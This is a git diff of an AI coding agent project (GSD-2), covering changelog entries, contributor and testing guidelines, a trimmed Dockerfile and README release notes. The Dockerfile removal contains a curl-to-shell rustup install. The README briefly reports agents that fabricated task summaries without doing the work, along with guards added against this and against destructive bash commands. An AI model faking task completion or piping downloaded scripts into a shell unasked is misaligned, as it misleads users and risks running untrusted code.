+- **web**: make web UI mobile responsive (#2354)
+- **gsd**: add `/gsd rethink` command for conversational project reorganization (#2459)
+- **gsd**: add renderCall/renderResult previews to DB tools (#2273)
+- add timestamps on user and assistant messages (#2368)
+- **gsd**: add `/gsd mcp` command for MCP server status and connectivity (#2362)
+- complete offline mode support (#2429)
+- **system-context**: inject global ~/.gsd/agent/KNOWLEDGE.md into system prompt (#2331)
+
+### Fixed
+- **gsd**: handle retentionDays=0 on Windows + run windows-portability on PRs (#2460)
+- use Array.from instead of Buffer.from for native processStreamChunk state (#2348)
+- **gsd**: isInheritedRepo conflates ~/.gsd with project .gsd when git root is $HOME (#2398)
+- reconcile disk milestones missing from DB in deriveStateFromDb (#2416) (#2422)
+- **auto**: reset recoveryAttempts on unit re-dispatch (#2322) (#2424)
+- detect and preserve submodule state during worktree teardown (#2337) (#2425)
+- **auto-start**: handle survivor branch recovery in phase=complete (#2358) (#2427)
+- **gsd**: widen test search window for CRLF portability on Windows (#2458)
+- **gsd**: preserve rich task plans on DB roundtrip (#2450) (#2453)
+- merge worktree back to main when stopAuto is called after milestone completion (#2317) (#2430)
+- **gsd**: skip doctor directory checks for pending slices (#2446)
+- **gsd**: migrate completion/validation prompts to DB-backed tools (#2449)
+- **gsd**: prevent saveArtifactToDb from overwriting larger files with truncated content (#2442) (#2447)
+- stop auto loop on real code merge conflicts (#2330) (#2428)
+- classify terminated/connection errors as transient in provider error handler (#2309) (#2432)
+- archive completed-units.json on milestone transition and sync metrics.json (#2313) (#2431)
+- supervision timeouts now respect task est: annotations (#2243) (#2434)
+- auto_pr: true now actually creates PRs — fix 3 interacting bugs (#2302) (#2433)
+- **gsd**: insert DB row when generating milestone ID (#2416)
+- **gsd**: reconcile disk-only milestones into DB in deriveStateFromDb (#2416)
+- **preferences**: deduplicate unrecognized format warning on repeated loads (#2375)
+- gate auto-mode bootstrap on SQLite availability (#2419) (#2421)
+- block /gsd quick when auto-mode is active (#2420)
+- **ci**: add Rust target for all platforms, not just cross-compilation
+- **ci**: restore Rust target triple and separate cross-compilation setup
+- **ci**: separate cross-compilation target from toolchain install
+
+### Changed
+- migrate D-G test files from createTestContext to node:test (#2418)
+- **test**: replace try/finally with beforeEach/afterEach in packages tests (#2390)
+- **test**: migrate gsd/tests s-z from custom harness to node:test (#2397)
+- **test**: migrate gsd/tests o-r from custom harness to node:test (#2401)
+- **test**: migrate gsd/tests i-n from custom harness to node:test (#2399)
+- **test**: migrate gsd/tests a-c from custom harness to node:test (#2400)
+- **test**: replace try/finally with t.after() in gsd/tests (e-i) (#2396)
+- **test**: replace try/finally with t.after() in gsd/tests (a-d) (#2395)
+- **test**: replace try/finally with t.after() in src/tests (o-z) (#2392)
+- **test**: replace try/finally with t.after() in src/tests (a-n) (#2394)
+
+## [2.44.0] - 2026-03-24
+
+### Added
+- **core**: support for 'non-api-key' provider extensions like Claude Code CLI (#2382)
+- **docker**: add official Docker sandbox template for isolated GSD auto mode (#2360)
+- **gsd**: show per-prompt token cost in footer behind show_token_cost preference (#2357)
+- **web**: add "Change project root" button to web UI (#2355)
+- **gsd**: Tool-driven write-side state transitions — replace markdown mutation with atomic SQLite tool calls (#2141)
+- **S06/T02**: Strip all 16 lazy createRequire fallback paths from migr…
+- **S05/T04**: Migrate remaining 6 callers (auto-prompts, auto-recovery…
+- **S05/T03**: Migrate 7 warm/cold callers (doctor, doctor-checks, visu…
+- **S05/T02**: Extend migrateHierarchyToDb to populate v8 planning colu…
+- **S05/T01**: Schema v10 adds replan_triggered_at column; deriveStateF…
+- **S04/T03**: Migrate auto-dispatch.ts (3 rules), auto-verification.ts…
+- **S04/T02**: Migrate dispatch-guard.ts to DB queries with isDbAvailab…
+- **S01/T03**: Migrate planning prompts to DB-backed tool guidance and…
+- **S01/T01**: Partially advanced schema v8 groundwork and documented t…
+- **gsd**: tool-driven write-side state transitions (M001)
+
+### Fixed
+- post-migration cleanup — pragmas, rollbacks, tool gaps, stale code (#2410)
+- **test**: normalize CRLF in auto-stash-merge assertion for Windows
+- **test**: swallow EPERM on Windows temp dir cleanup in auto-stash-merge test
+- **gsd**: add file-based fallbacks for DB-dependent code paths and fix CI test failures
+- **gsd**: remove stale observabilityIssues reference in journal-integration test
+- **extensions**: detect TypeScript syntax in .js extension files and suggest renaming to .ts (#2386)
+- **gsd**: prevent planning data loss from destructive upsert and post-unit re-import (#2370)
+- **gsd**: use correct notify severity type ("warning" not "warn")
+- **web**: resolve compiled .js modules for all subprocess calls under node_modules (#2320)
+- **test**: increase perf assertion threshold to prevent CI flake (#2327)
+- add missing SQLite WAL sidecars and journal to runtime exclusion lists (#2299)
+- **gsd**: remove stale observability validator + fix greenfield worktree check
+- **memory**: fix memory and resource leaks across TUI, LSP, DB, and automation (#2314)
+- **gsd**: preserve freeform DECISIONS.md content on decision save (#2319)
+- **pi-ai**: restore alibaba-coding-plan provider via models.custom.ts (#2350)
+- **doctor**: skip false env_dependencies error in auto-worktrees (#2318)
+- **gsd**: auto-stash dirty files before squash merge and surface dirty filenames in error (#2298)
+- **gsd**: keep params as any in db-tools executors (CI tsconfig is stricter)
+- **gsd**: replace any types in db-tools executor signatures
+- **gsd**: resolve 4 TS compilation errors from parser migration
+- **gsd**: wrap plan-task DB writes in transaction + untrack .gsd/ artifacts
+- **S04/T04**: Add planning-crossval tests proving DB↔rendered↔parsed pa…
+- **S04/T01**: Add schema v9 migration with sequence column on slices/ta…
+- remove .gsd/ milestone artifacts from git index
+- **tests**: update remediation step assertions and crossval fixture
+- **gsd**: address all 7 review findings from PR #2141
+- **tests**: remove invalid `seq` property from insertMilestone calls
+
+### Changed
+- **contrib**: add CODEOWNERS and team workflow docs (#2286)
+- **M001**: auto-commit after complete-milestone
+- **M001**: auto-commit after validate-milestone
+- **M001/S06**: auto-commit after complete-slice
+- **M001/S06**: auto-commit after plan-slice
+- **M001/S06**: auto-commit after research-slice
+- **M001/S05**: auto-commit after complete-slice
+- **M001/S05**: auto-commit after plan-slice
+- **M001/S05**: auto-commit after research-slice
+- **M001/S04**: auto-commit after complete-slice
+- **M001/S04**: auto-commit after research-slice
+- **M001/S03**: auto-commit after complete-slice
+- **M001/S03**: auto-commit after plan-slice
+- **M001/S03**: auto-commit after research-slice
+- **M001/S02**: auto-commit after complete-slice
+- **M001/S02**: auto-commit after plan-slice
+- **M001/S02**: auto-commit after research-slice
+- **M001/S01**: auto-commit after complete-slice
+
+## [2.43.0] - 2026-03-23
+
+### Added
+- **forensics**: opt-in duplicate detection before issue creation (#2105)
+
+### Fixed
+- prevent banner from printing twice on first run (#2251)
+- **test**: Windows CI — use double quotes in git commit message (#2252)
+- **async-jobs**: suppress duplicate follow-up for awaited job results (#2248) (#2250)
+- **gsd**: remove force-staging of .gsd/milestones/ through symlinks (#2247) (#2249)
+- **gsd**: remove over-broad skill activation heuristic (#2239) (#2244)
+- **auth**: fall through to env/fallback when OAuth credential has no registered provider (#2097)
+- **lsp**: bound message buffer and clean up stale client state (#2171)
+- clean up macOS numbered .gsd collision variants (#2205) (#2210)
+- **search**: keep duplicate-search loop guard armed (#2117)
+- clean up extension error listener on session dispose (#2165)
+- **web**: resolve 4 pre-existing onboarding contract test failures (#2209)
+- async bash job timeout hangs indefinitely instead of erroring out (#2214)
+- **gsd**: apply fast service tier outside auto-mode (#2126)
+- **interactive**: clean up leaked SIGINT and extension selector listeners (#2172)
+- **ci**: standardize GitHub Actions and Node.js versions (#2169)
+- **native**: resolve memory leaks in glob, ttsr, and image overflow (#2170)
+- extension resource management — prune stale dirs, fix isBuiltIn, gate skills on Skill tool, suppress search warnings (#2235)
+- batch isolated fixes — error messages, preferences, web auth, MCP vars, detection, gitignore (#2232)
+- document iTerm2 Ctrl+Alt+G keybinding conflict and add helpful hint (#2231)
+- **footer**: display active inference model during execution (#1982)
+- **web**: kill stale server process before launch to prevent EADDRINUSE (#1934) (#2034)
+- **git**: force LC_ALL=C in GIT_NO_PROMPT_ENV to support non-English locales (#2035)
+- **forensics**: force gh CLI for issue creation to prevent misrouting (#2067) (#2094)
+- force-stage .gsd/milestones/ artifacts when .gsd is a symlink (#2104) (#2112)
+- **pi-ai**: correct Copilot context window and output token limits (#2118)
+
+### Changed
+- startup optimizations — pre-compiled extensions, compile cache, batch discovery (#2125)
+
+## [2.42.0] - 2026-03-22
+
+### Added
+- **gsd**: declarative workflow engine — YAML-defined workflows through the auto-loop (#2024)
+- **gsd**: unified rule registry, event journal, journal query tool, and tool naming convention (#1928)
+- **ci**: PR risk checker — classify changed files by system and surface risk level (#1930)
+- ADR attribution — distinguish human vs agent vs collaborative decisions (#1830)
+- add /gsd fast command and gate service tier icon to supported models (#1848) (#1862)
+- add --host, --port, --allowed-origins flags for web mode (#1847) (#1873)
+
+### Fixed
+- **tests**: wrap rmSync cleanup in try/catch for Windows EPERM
+- **tests**: add maxRetries to rmSync cleanup for Windows EPERM compatibility
+- recursive key sorting in tool-call loop guard hash function (#1962)
+- use path.sep for cross-platform path traversal guards and test assertions
+- **tests**: use cross-platform path split in run-manager timestamp test
+- prevent SIGTSTP crash on Windows (#2018)
+- add missing codeFilesChanged to journal integration test mock
+- **repo-identity**: use native realpath on Windows to resolve 8.3 short paths (#1960)
+- **doctor**: gate roadmap checkbox on summary existing on disk, not issue detection (#1915)
+- warn when milestone merge contains only metadata and no code (#1906) (#1927)
+- **worktree**: resolve 8.3 short paths and use shell mode for .bat hooks on Windows (#1956)
+- **web**: persist auth token in sessionStorage to survive page refreshes (#1877)
+- clean up SQUASH_MSG after squash-merge and guard worktree teardown against uncommitted changes (#1868)
+- populate RecoveryContext in hook unit supervision to prevent crash on stalled tool recovery (#1867)
+- resolve worktree path from git registry when .gsd/ symlink is shadowed (#1866)
+- resolve Node v24 web boot failure — ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING (#1864)
+- **auto**: broaden worktree health check to all ecosystems (#1860)
+- **doctor**: cascade slice uncheck when task_done_missing_summary unchecks tasks (#1850) (#1858)
+- defend exit path against ESM module cache mismatch (#1854)
+- escape parentheses in paths before bash shell-out, fix __extensionDir fallback (#1872)
+- use PowerShell Start-Process for Windows browser launch, prevent URL wrapping (#1870)
+- clear stale unit state and restore CWD when step-wizard exits auto-loop (#1869)
+- prevent cross-project state leak in brand-new directories (#1639) (#1861)
+- reconcile worktree HEAD with milestone branch ref before squash merge (#1846) (#1859)
+- normalize Windows backslash paths in bash command strings (#1436) (#1863)
+- parsePlan and verifyExpectedArtifact recognize heading-style task entries (#1691) (#1857)
+- sync all milestone dirs regardless of naming convention (#1547) (#1845)
+
 ## [2.41.0] - 2026-03-21
 
 ### Added
@@ -1598,7 +2601,36 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
 ### Changed
 - License updated to MIT
 
-[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...HEAD
+[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.67.0...HEAD
+[2.67.0]: https://github.com/gsd-build/gsd-2/compare/v2.66.1...v2.67.0
+[2.66.1]: https://github.com/gsd-build/gsd-2/compare/v2.66.0...v2.66.1
+[2.66.0]: https://github.com/gsd-build/gsd-2/compare/v2.65.0...v2.66.0
+[2.65.0]: https://github.com/gsd-build/gsd-2/compare/v2.64.0...v2.65.0
+[2.64.0]: https://github.com/gsd-build/gsd-2/compare/v2.63.0...v2.64.0
+[2.63.0]: https://github.com/gsd-build/gsd-2/compare/v2.62.1...v2.63.0
+[2.62.1]: https://github.com/gsd-build/gsd-2/compare/v2.62.0...v2.62.1
+[2.62.0]: https://github.com/gsd-build/gsd-2/compare/v2.61.0...v2.62.0
+[2.61.0]: https://github.com/gsd-build/gsd-2/compare/v2.60.0...v2.61.0
+[2.60.0]: https://github.com/gsd-build/gsd-2/compare/v2.59.0...v2.60.0
+[2.59.0]: https://github.com/gsd-build/gsd-2/compare/v2.58.0...v2.59.0
+[2.58.0]: https://github.com/gsd-build/gsd-2/compare/v2.57.0...v2.58.0
+[2.57.0]: https://github.com/gsd-build/gsd-2/compare/v2.56.0...v2.57.0
+[2.56.0]: https://github.com/gsd-build/gsd-2/compare/v2.55.0...v2.56.0
+[2.55.0]: https://github.com/gsd-build/gsd-2/compare/v2.54.0...v2.55.0
+[2.54.0]: https://github.com/gsd-build/gsd-2/compare/v2.53.0...v2.54.0
+[2.53.0]: https://github.com/gsd-build/gsd-2/compare/v2.52.0...v2.53.0
+[2.52.0]: https://github.com/gsd-build/gsd-2/compare/v2.51.0...v2.52.0
+[2.51.0]: https://github.com/gsd-build/gsd-2/compare/v2.50.0...v2.51.0
+[2.50.0]: https://github.com/gsd-build/gsd-2/compare/v2.49.0...v2.50.0
+[2.49.0]: https://github.com/gsd-build/gsd-2/compare/v2.48.0...v2.49.0
+[2.48.0]: https://github.com/gsd-build/gsd-2/compare/v2.47.0...v2.48.0
+[2.47.0]: https://github.com/gsd-build/gsd-2/compare/v2.46.1...v2.47.0
+[2.46.1]: https://github.com/gsd-build/gsd-2/compare/v2.46.0...v2.46.1
+[2.46.0]: https://github.com/gsd-build/gsd-2/compare/v2.45.0...v2.46.0
+[2.45.0]: https://github.com/gsd-build/gsd-2/compare/v2.44.0...v2.45.0
+[2.44.0]: https://github.com/gsd-build/gsd-2/compare/v2.43.0...v2.44.0
+[2.43.0]: https://github.com/gsd-build/gsd-2/compare/v2.42.0...v2.43.0
+[2.42.0]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...v2.42.0
 [2.41.0]: https://github.com/gsd-build/gsd-2/compare/v2.40.0...v2.41.0
 [2.40.0]: https://github.com/gsd-build/gsd-2/compare/v2.39.0...v2.40.0
 [2.39.0]: https://github.com/gsd-build/gsd-2/compare/v2.38.0...v2.39.0
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index acf637fc2..335cf7842 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -11,6 +11,59 @@ Read [VISION.md](VISION.md) before contributing. It defines what GSD-2 is, what
 3. **No issue? Create one first** for new features. Bug fixes for obvious problems can skip this step.
 4. **Architectural changes require an RFC.** If your change touches core systems (auto-mode, agent-core, orchestration), open an issue describing your approach and get approval before writing code. We use Architecture Decision Records (ADRs) for significant decisions.
 
+## Branching and commits
+
+Always work on a dedicated branch. Never push directly to `main`.
+
+**Branch naming:** `<type>/<short-description>`
+
+| Type | When to use |
+|------|-------------|
+| `feat/` | New functionality |
+| `fix/` | Bug or defect correction |
+| `refactor/` | Code restructuring, no behavior change |
+| `test/` | Adding or updating tests |
+| `docs/` | Documentation only |
+| `chore/` | Dependencies, tooling, housekeeping |
+| `ci/` | CI/CD configuration |
+
+**Commit messages** must follow [Conventional Commits](https://www.conventionalcommits.org/). The commit-msg hook enforces this locally; CI enforces it on push.
+
+```
+<type>(<scope>): <short summary>
+```
+
+Valid types: `feat` `fix` `docs` `chore` `refactor` `test` `infra` `ci` `perf` `build` `revert`
+
+```
+feat(pi-agent-core): add streaming output for long-running tasks
+fix(pi-ai): resolve null pointer on empty provider response
+chore(deps): bump typescript from 5.3.0 to 5.4.2
+```
+
+Keep branches current by rebasing onto `main` — do not merge `main` into your feature branch:
+
+```bash
+git fetch origin
+git rebase origin/main
+```
+
+## Working with GSD (team workflow)
+
+GSD uses worktree-based isolation for multi-developer work. If you're contributing with GSD running, enable team mode in your project preferences:
+
+```yaml
+# .gsd/PREFERENCES.md
+---
+version: 1
+mode: team
+---
+```
+
+This enables unique milestone IDs, branch pushing, and pre-merge checks — preventing milestone ID collisions when multiple contributors run auto-mode simultaneously. Each developer gets their own isolated worktree; squash merges to `main` happen independently.
+
+For full details see [docs/working-in-teams.md](docs/working-in-teams.md) and [docs/git-strategy.md](docs/git-strategy.md).
+
 ## Opening a pull request
 
 ### PR description format
@@ -65,10 +118,12 @@ If your PR changes any public API, CLI behavior, config format, or file structur
 
 AI-generated PRs are first-class citizens here. We welcome them. We just ask for transparency:
 
-- **Disclose it.** Note that the PR is AI-assisted in your description.
+- **Disclose it.** Note that the PR is AI-assisted in your description. Do not credit the AI tool as an author or co-author in the commit or PR.
 - **Test it.** AI-generated code must be tested to the same standard as human-written code. "The AI said it works" is not a test plan.
 - **Understand it.** You should be able to explain what the code does and why. If a reviewer asks a question, "I'll ask the AI" is not an answer.
 
+AI agents opening PRs must follow the same workflow as human contributors: clean working tree, new branch per task, CI passing before requesting review. Multi-phase work should start as a Draft PR and only move to Ready when complete.
+
 AI PRs go through the same review process as any other PR. No special treatment in either direction.
 
 ## Architecture guidelines
@@ -91,9 +146,14 @@ The codebase is organized into these areas. All are open to contributions:
 | AI/LLM layer | `packages/pi-ai` | Provider integrations, model handling |
 | Agent core | `packages/pi-agent-core` | Agent orchestration — RFC required for changes |
 | Coding agent | `packages/pi-coding-agent` | The main coding agent |
+| MCP server | `packages/mcp-server` | Project state tools and MCP protocol |
 | GSD extension | `src/resources/extensions/gsd/` | GSD workflow — RFC required for auto-mode |
-| Native bindings | `native/` | Platform-specific native code |
+| Other extensions | `src/resources/extensions/` | Browser, search, voice, MCP client, etc. |
+| Native engine | `native/` | Rust N-API modules (grep, git, AST, etc.) |
+| VS Code extension | `vscode-extension/` | Chat participant, sidebar, RPC integration |
+| Web interface | `web/` | Browser-based dashboard |
 | CI/Build | `.github/`, `scripts/` | Workflows, build scripts |
+| Documentation | `docs/` | User guides, ADRs, SDK docs |
 
 ## Review process
 
@@ -103,12 +163,113 @@ PRs go through automated review first, then human review. To help us review effi
 - Respond to review comments. If you disagree, explain why — discussion is welcome.
 - If your PR has been open for a while without review, ping in Discord. We're a small team and things slip.
 
+### What reviewers verify
+
+Reading a diff is not the same as verifying a change. Our review standard is execution-based, not static-analysis-based.
+
+**What reviewers do:**
+
+1. **Check out the branch** — check out the PR branch locally (or in a worktree). Don't review from the diff view alone.
+2. **Build the branch** — run `npm run build`. A diff that doesn't compile is not reviewable.
+3. **Run the test suite** — run `npm test`. CI status is a signal, not a substitute for local verification.
+4. **Trace root cause for bug fixes** — confirm the diff addresses the root cause described in the issue, not just the symptom.
+5. **Check for a regression test** — bug fixes must include a test that would have caught the original bug. If it's absent, the fix is incomplete.
+
+Only after completing these steps should a reviewer make claims about correctness.
+
+**What "looks right" means:**
+
+"Looks right" is the starting point for review, not the conclusion. "The tests pass" only means the tests pass — not that the claimed bug is fixed or the feature works as described. A well-written commit message on a broken change is still a broken change.
+
+### What contributors must provide to unblock review
+
+- **Bug fixes** — include a regression test. A fix without a test is an assertion, not a proof.
+- **Features** — include tests covering the primary success path and at least one failure path.
+- **Behavior changes** — update or replace any existing tests that cover the changed behavior. Don't leave passing-but-wrong tests in place.
+
+If your PR claims to fix issue #N, reviewers will verify the fix addresses the root cause described in #N — not just that CI is green.
+
+## Testing standards
+
+This project uses Node.js built-in `node:test` as the test runner. All new tests must follow these patterns:
+
+### Use `node:test` and `node:assert/strict`
+
+```typescript
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+```
+
+Do not use `createTestContext()` from `test-helpers.ts` (legacy, being removed). Do not introduce Jest, Vitest, or other test frameworks.
+
+### Use `beforeEach`/`afterEach` or `t.after()` for cleanup — never `try`/`finally`
+
+```typescript
+// ✅ CORRECT — shared fixture with beforeEach/afterEach
+describe("feature", () => {
+  let tmp: string;
+  beforeEach(() => { tmp = mkdtempSync(join(tmpdir(), "test-")); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  test("case", () => { /* clean test body */ });
+});
+
+// ✅ CORRECT — per-test cleanup with t.after()
+test("case", (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), "test-"));
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
+  // test body
+});
+
+// ❌ WRONG — inline try/finally
+test("case", () => {
+  const tmp = mkdtempSync(join(tmpdir(), "test-"));
+  try {
+    // test body
+  } finally {
+    rmSync(tmp, { recursive: true, force: true });
+  }
+});
+```
+
+**When to use which:**
+- `beforeEach`/`afterEach` — when all tests in a `describe` block share the same setup/teardown pattern
+- `t.after()` — when each test has unique cleanup (different fixtures, env vars, etc.)
+- `try`/`finally` — only inside standalone helper functions that don't have access to the test context `t` (e.g., `withEnv()`, `capture()`)
+
+### Template literal fixture data
+
+When constructing multi-line fixture content (markdown, YAML, etc.) inside indented test blocks, use array join to avoid unintended leading whitespace:
+
+```typescript
+// ✅ CORRECT — no indentation leakage
+const content = [
+  "## Slices",
+  "- [x] **S01: First slice**",
+  "- [ ] **S02: Second slice**",
+].join("\n");
+
+// ❌ WRONG — template literal inside describe/test adds leading spaces
+const content = `
+  ## Slices
+  - [x] **S01: First slice**
+`;
+// Each line now has 2 leading spaces, breaking ^## regex anchors
+```
+
+### Test-first for bug fixes
+
+Bug fixes must include a regression test that fails before the fix and passes after. Write the test first, confirm it fails, then apply the fix. See the `test-first-bugfix` skill.
+
 ## Local development
 
 ```bash
 # Install dependencies
 npm ci
 
+# Install git hooks (secret scanning + commit message validation)
+npm run secret-scan:install-hook
+
 # Build
 npm run build
 
@@ -119,6 +280,10 @@ npm test
 npx tsc --noEmit
 ```
 
+Run `npm run secret-scan:install-hook` once after cloning. It installs two hooks:
+- **pre-commit** — blocks commits containing hardcoded secrets or credentials
+- **commit-msg** — validates Conventional Commits format before the commit lands
+
 CI must pass before your PR will be reviewed. Run these locally to save time.
 
 ## Security
diff --git a/Dockerfile b/Dockerfile
index 45a18d128..b69e4bc6c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,26 +1,5 @@
 # ──────────────────────────────────────────────
-# Stage 1: CI Builder
-# Image: ghcr.io/gsd-build/gsd-ci-builder
-# Used by: pipeline.yml Dev stage
-# ──────────────────────────────────────────────
-FROM node:24-bookworm AS builder
-
-# Rust toolchain (stable, minimal profile)
-RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal
-ENV PATH="/root/.cargo/bin:${PATH}"
-
-# Cross-compilation for linux-arm64
-RUN apt-get update && apt-get install -y --no-install-recommends \
-    gcc-aarch64-linux-gnu \
-    g++-aarch64-linux-gnu \
-    && rustup target add aarch64-unknown-linux-gnu \
-    && rm -rf /var/lib/apt/lists/*
-
-# Verify toolchain
-RUN node --version && rustc --version && cargo --version
-
-# ──────────────────────────────────────────────
-# Stage 2: Runtime
+# Runtime
 # Image: ghcr.io/gsd-build/gsd-pi
 # Used by: end users via docker run
 # ──────────────────────────────────────────────
diff --git a/README.md b/README.md
index 99fd5a4fc..34ee30c1a 100644
--- a/README.md
+++ b/README.md
@@ -7,8 +7,9 @@
 [![npm version](https://img.shields.io/npm/v/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi)
 [![npm downloads](https://img.shields.io/npm/dm/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi)
 [![GitHub stars](https://img.shields.io/github/stars/gsd-build/GSD-2?style=for-the-badge&logo=github&color=181717)](https://github.com/gsd-build/GSD-2)
-[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/gsd)
+[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.com/invite/nKXTsAcmbT)
 [![License](https://img.shields.io/badge/license-MIT-blue?style=for-the-badge)](LICENSE)
+[![$GSD Token](https://img.shields.io/badge/$GSD-Dexscreener-1C1C1C?style=for-the-badge&logo=data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlIGN4PSIxMiIgY3k9IjEyIiByPSIxMCIgZmlsbD0iIzAwRkYwMCIvPjwvc3ZnPg==&logoColor=00FF00)](https://dexscreener.com/solana/dwudwjvan7bzkw9zwlbyv6kspdlvhwzrqy6ebk8xzxkv)
 
 The original GSD went viral as a prompt framework for Claude Code. It worked, but it was fighting the tool — injecting prompts through slash commands, hoping the LLM would follow instructions, with no actual control over context windows, sessions, or execution.
 
@@ -18,81 +19,77 @@ One command. Walk away. Come back to a built project with clean git history.
 
 <pre><code>npm install -g gsd-pi@latest</code></pre>
 
+> GSD now provisions a managed [RTK](https://github.com/rtk-ai/rtk) binary on supported macOS, Linux, and Windows installs to compress shell-command output in `bash`, `async_bash`, `bg_shell`, and verification flows. GSD forces `RTK_TELEMETRY_DISABLED=1` for all managed invocations. Set `GSD_RTK_DISABLED=1` to disable the integration.
+
 > **📋 NOTICE: New to Node on Mac?** If you installed Node.js via Homebrew, you may be running a development release instead of LTS. **[Read this guide](./docs/node-lts-macos.md)** to pin Node 24 LTS and avoid compatibility issues.
 
 </div>
 
 ---
 
-## What's New in v2.41.0
+## What's New in v2.67
 
-### New Features
+### Context Engineering
 
-- **Browser-based web interface** — run GSD from the browser with `gsd --web`. Full project management, real-time progress, and multi-project support via server-sent events. (#1717)
-- **Doctor: worktree lifecycle checks** — `/gsd doctor` now validates worktree health, detects orphaned worktrees, consolidates cleanup, and enhances `/worktree list` with lifecycle status. (#1814)
-- **CI: docs-only PR detection** — PRs that only change documentation skip build and test steps, with a new prompt injection scan for security. (#1699)
-- **Custom Models guide** — new documentation for adding custom providers (Ollama, vLLM, LM Studio, proxies) via `models.json`. (#1670)
+- **Tiered Context Injection (M005)** — relevance-scoped context with 65%+ token reduction. Decision scope cascade derives context from slice metadata instead of blanket injection.
+- **Resilient transient error recovery** — defers to Core RetryHandler and fixes cmdCtx race conditions for more reliable auto-mode sessions.
 
-### Data Loss Prevention (Critical Fixes)
+### Provider & Model Improvements
 
-This release includes 7 fixes preventing silent data loss in auto-mode:
+- **Anthropic subscription routing** — users with Anthropic subscriptions are automatically routed through Claude Code CLI provider with proper display names across all UI surfaces.
+- **Claude Code provider hardening** — native Windows claude lookup, fallback guards, and `out of extra usage` error matching.
+- **XML parameter recovery** — pi-ai recovers XML parameters trapped in JSON strings from providers.
 
-- **Hallucination guard** — execute-task agents that complete with zero tool calls are now rejected as hallucinated. Previously, agents could produce detailed but fabricated summaries without writing any code, wasting ~$25/milestone. (#1838)
-- **Merge anchor verification** — before deleting a milestone worktree/branch, GSD now verifies the code is actually on the integration branch. Prevents orphaning commits when squash-merge produces an empty diff. (#1829)
-- **Dirty working tree detection** — `nativeMergeSquash` now distinguishes dirty-tree rejections from content conflicts, preventing silent commit loss when synced `.gsd/` files block the merge. (#1752)
-- **Doctor cleanup safety** — the `orphaned_completed_units` check no longer auto-fixes during post-task health checks. Previously, timing races could cause the doctor to remove valid completion keys, reverting users to earlier tasks. (#1825)
-- **Root file reverse-sync** — worktree teardown now syncs root-level `.gsd/` files (PROJECT.md, REQUIREMENTS.md, completed-units.json) back to the project root. Previously these were lost on milestone closeout. (#1831)
-- **Empty merge guard** — milestone branches with unanchored code changes are preserved instead of deleted when squash-merge produces nothing to commit. (#1755)
-- **Crash-safe task closeout** — orphaned checkboxes in PLAN.md are unchecked on retry, preventing phantom task completion. (#1759)
+### Safety & Data Integrity
 
-### Auto-Mode Stability
+- **LLM safety harness** — auto-mode damage control prevents the LLM from running destructive operations or querying `gsd.db` directly via bash.
+- **5-wave state machine hardening** — critical data integrity fixes across atomic writes, randomized tmp paths, event log reconciliation, session recovery, and consistency enforcement. 86+ regression tests added.
+- **Discussion gate enforcement** — mechanical enforcement for discussion question gates with fail-closed behavior.
+- **Enhanced verification** — pre-execution plan verification checks, post-execution cross-task consistency checks, blocking behavior and strict mode.
 
-- **Terminal hang fix** — `stopAuto()` now resolves pending promises, preventing the terminal from freezing permanently after stopping auto-mode. (#1818)
-- **Signal handler coverage** — SIGHUP and SIGINT now clean up lock files, not just SIGTERM. Prevents stranded locks on VS-Code crash. (#1821)
-- **Needs-discussion routing** — milestones in `needs-discussion` phase now route to the smart entry UI instead of hard-stopping, breaking the infinite loop. (#1820)
-- **Infrastructure error handling** — auto-mode stops immediately on ENOSPC, ENOMEM, and similar unrecoverable errors instead of retrying. (#1780)
-- **Dependency-aware dispatch** — slice dispatch now uses declared `depends_on` instead of positional ordering. (#1770)
-- **Queue mode depth verification** — the write gate now processes depth verification in queue mode, fixing a deadlock where CONTEXT.md writes were permanently blocked. (#1823)
+### Parallel Execution & Dispatch
 
-### Roadmap Parser Improvements
+- **Slice-level parallelism** — dependency-aware parallel dispatch within a milestone, not just across milestones.
+- **Parallel research slices** — research and milestone validation run in parallel.
+- **Worker model override** — configure different models for parallel milestone workers.
 
-- **Table format support** — roadmaps using markdown tables (`| S01 | Title | Risk | Status |`) are now parsed correctly. (#1741)
-- **Prose header fallback** — when `## Slices` contains H3 headers instead of checkboxes, the prose parser is invoked as a fallback. (#1744)
-- **Completion marker detection** — prose headers with `✓` or `(Complete)` markers are correctly identified as done. (#1816)
-- **Zero-slice stub handling** — stub roadmaps from `/gsd queue` return `pre-planning` instead of `blocked`. (#1826)
-- **Immediate roadmap fix** — roadmap checkbox and UAT stub are fixed immediately after last task instead of deferring to `complete-slice`. (#1819)
+### TUI & Notifications
 
-### State & Git Improvements
+- **Persistent notification panel** — TUI overlay, widget, and web API for real-time notifications.
+- **Remote questions race** — local TUI races against remote channel (Slack/Discord) instead of remote-only routing.
+- **OS-specific keyboard shortcuts** — shortcut hints now adapt to macOS/Linux/Windows.
+- **`/gsd show-config`** — inspect active configuration at a glance.
 
-- **CONTEXT-DRAFT.md fallback** — `depends_on` is read from CONTEXT-DRAFT.md when CONTEXT.md doesn't exist, preventing draft milestones from being promoted past dependency constraints. (#1743)
